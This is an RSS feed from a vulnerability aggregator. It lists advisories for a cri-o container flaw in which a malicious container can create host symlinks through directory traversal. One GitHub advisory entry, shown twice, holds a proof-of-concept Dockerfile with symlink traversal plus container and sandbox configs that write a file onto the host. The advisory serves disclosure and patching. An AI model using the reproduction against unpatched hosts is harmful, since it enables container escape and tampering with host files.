<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 04 Oct 2026 17:37:25 +0000</lastBuildDate>
    <item>
      <title>bdu:2024-04923</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2024-04923</link>
      <description>bdu:2024-04923</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2024-04923</guid>
    </item>
    <item>
      <title>EUVD-2026-357257</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-357257</link>
      <description>EUVD-2026-357257</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-357257</guid>
    </item>
    <item>
      <title>fkie_cve-2024-5154</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-5154</link>
      <description>&lt;p&gt;A flaw was found in cri-o. A malicious container can create a symbolic link to arbitrary files on the host via directory traversal (“../“). This flaw allows the container to read and write to arbitrary files on the host system.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;A flaw was found in cri-o. A malicious container can create a symbolic link to arbitrary files on the host via directory traversal (“../“). This flaw allows the container to read and write to arbitrary files on the host system.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-5154</guid>
    </item>
    <item>
      <title>GHSA-j9hf-98c3-wrm8 — malicious container creates symlink "mtab" on the host External</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-j9hf-98c3-wrm8</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/cri-o/cri-o&lt;/p&gt;
&lt;p&gt;### Impact
A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.&lt;/p&gt;
&lt;p&gt;A workload built from this Dockerfile:
```
FROM docker.io/library/busybox as source
RUN mkdir /extra &amp;amp;&amp;amp; cd /extra &amp;amp;&amp;amp; ln -s ../../../../../../../../root etc&lt;/p&gt;
&lt;p&gt;FROM scratch&lt;/p&gt;
&lt;p&gt;COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra .&lt;/p&gt;
&lt;p&gt;```&lt;/p&gt;
&lt;p&gt;and this container config:&lt;/p&gt;
&lt;p&gt;```
{
  &amp;#34;metadata&amp;#34;: {
      &amp;#34;name&amp;#34;: &amp;#34;busybox&amp;#34;
  },
  &amp;#34;image&amp;#34;:{
      &amp;#34;image&amp;#34;: &amp;#34;localhost/test&amp;#34;
  },
  &amp;#34;command&amp;#34;: [
      &amp;#34;/bin/true&amp;#34;
  ],
  &amp;#34;linux&amp;#34;: {
  }
}&lt;/p&gt;
&lt;p&gt;```
and this sandbox config  
```
{
  &amp;#34;metadata&amp;#34;: {
    &amp;#34;name&amp;#34;: &amp;#34;test-sandbox&amp;#34;,
    &amp;#34;namespace&amp;#34;: &amp;#34;default&amp;#34;,
    &amp;#34;attempt&amp;#34;: 1,
    &amp;#34;uid&amp;#34;: &amp;#34;edishd83djaideaduwk28bcsb&amp;#34;
  },
  &amp;#34;linux&amp;#34;: {
    &amp;#34;security_context&amp;#34;: {
      &amp;#34;namespace_options&amp;#34;: {
        &amp;#34;network&amp;#34;: 2
      }
    }
  }
}&lt;/p&gt;
&lt;p&gt;```&lt;/p&gt;
&lt;p&gt;will create a file on host `/host/mtab`&lt;/p&gt;
&lt;p&gt;### Patches
1.30.1, 1.29.5, 1.28.7&lt;/p&gt;
&lt;p&gt;### Workarounds
Unfortunately not&lt;/p&gt;
&lt;p&gt;### References
_Are there any links users can visit to find out more?_&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/cri-o/cri-o&lt;/p&gt;
&lt;p&gt;### Impact
A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.&lt;/p&gt;
&lt;p&gt;A workload built from this Dockerfile:
```
FROM docker.io/library/busybox as source
RUN mkdir /extra &amp;amp;&amp;amp; cd /extra &amp;amp;&amp;amp; ln -s ../../../../../../../../root etc&lt;/p&gt;
&lt;p&gt;FROM scratch&lt;/p&gt;
&lt;p&gt;COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra .&lt;/p&gt;
&lt;p&gt;```&lt;/p&gt;
&lt;p&gt;and this container config:&lt;/p&gt;
&lt;p&gt;```
{
  &amp;#34;metadata&amp;#34;: {
      &amp;#34;name&amp;#34;: &amp;#34;busybox&amp;#34;
  },
  &amp;#34;image&amp;#34;:{
      &amp;#34;image&amp;#34;: &amp;#34;localhost/test&amp;#34;
  },
  &amp;#34;command&amp;#34;: [
      &amp;#34;/bin/true&amp;#34;
  ],
  &amp;#34;linux&amp;#34;: {
  }
}&lt;/p&gt;
&lt;p&gt;```
and this sandbox config  
```
{
  &amp;#34;metadata&amp;#34;: {
    &amp;#34;name&amp;#34;: &amp;#34;test-sandbox&amp;#34;,
    &amp;#34;namespace&amp;#34;: &amp;#34;default&amp;#34;,
    &amp;#34;attempt&amp;#34;: 1,
    &amp;#34;uid&amp;#34;: &amp;#34;edishd83djaideaduwk28bcsb&amp;#34;
  },
  &amp;#34;linux&amp;#34;: {
    &amp;#34;security_context&amp;#34;: {
      &amp;#34;namespace_options&amp;#34;: {
        &amp;#34;network&amp;#34;: 2
      }
    }
  }
}&lt;/p&gt;
&lt;p&gt;```&lt;/p&gt;
&lt;p&gt;will create a file on host `/host/mtab`&lt;/p&gt;
&lt;p&gt;### Patches
1.30.1, 1.29.5, 1.28.7&lt;/p&gt;
&lt;p&gt;### Workarounds
Unfortunately not&lt;/p&gt;
&lt;p&gt;### References
_Are there any links users can visit to find out more?_&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-j9hf-98c3-wrm8</guid>
    </item>
    <item>
      <title>RHSA-2024:10818 — Red Hat Security Advisory: OpenShift Container Platform 4.17.8 security update</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2024:10818</link>
      <description>&lt;p&gt;cri-o: malicious container can create symlink on host openssl: Possible denial of service in X.509 name checks Podman: Buildah: cri-o: FIPS Crypto-Policy Directory Mounting Issue in containers/common Go Library&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;cri-o: malicious container can create symlink on host openssl: Possible denial of service in X.509 name checks Podman: Buildah: cri-o: FIPS Crypto-Policy Directory Mounting Issue in containers/common Go Library&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2024:10818</guid>
    </item>
    <item>
      <title>WID-SEC-W-2024-1362 — Red Hat OpenShift: Mehrere Schwachstellen ermöglichen Offenlegung von Informationen und Dateimanipulation</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2024-1362</link>
      <description>&lt;p&gt;Ein lokaler Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Dateien zu manipulieren.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein lokaler Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Dateien zu manipulieren.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2024-1362</guid>
    </item>
  </channel>
</rss>
